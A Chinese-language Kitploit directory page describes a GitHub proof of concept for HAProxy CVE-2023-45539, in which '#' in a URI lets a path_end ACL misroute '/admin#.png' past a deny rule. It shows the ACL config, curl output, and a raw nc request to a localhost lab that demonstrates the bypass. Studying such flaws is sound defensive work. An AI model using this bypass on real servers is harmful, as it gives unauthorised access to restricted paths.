Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
HAProxy-CVE-2023-45539-PoC — HAProxy-CVE-2023-45539-PoC | Kitploit
工具/GitHubGitHub/slicingmelon/haproxy-cve-2023-45539-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试错误配置
GitHubslicingmelon/haproxy-cve-2023-45539-poc

HAProxy-CVE-2023-45539-PoC

HAProxy-CVE-2023-45539-PoC

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
21年前尚未审核
分享

HAProxy-CVE-2023-45539-PoC

HAProxy 2.8.2 之前的版本接受 # 作为 URI 组件的一部分,这可能导致远程攻击者在 path_end 规则被错误解释时获取敏感信息或造成其他未明确的影响,例如将 index.html#.png 路由到静态服务器。

此 CVE 中会被错误路由的并非后端应用“支持”的任何扩展名——而仅仅是 HAProxy 自身配置为使用 path_end(或正则)ACL 进行路由的那些扩展名。

root@kitploit:~
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static

这意味着:

  • HAProxy 并不关心后端是否真的能提供 .png、.js 等文件。
  • 它只看请求路径中的后缀匹配。
  • 如果后缀匹配到这些字符串之一,就会路由到 be_static。

因此:

/admin#.png → 匹配 .png → 进入 be_static → 绕过

下载工具

/admin#.asc → 不匹配 → 留在 be_app → 触发 deny → 403

root@kitploit:~
curl -i http://localhost:6655/public                                               
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain

APP OK
root@kitploit:~
curl -i http://localhost:6655/admin 
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

绕过

root@kitploit:~
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain

STATIC OK (routed by path_end)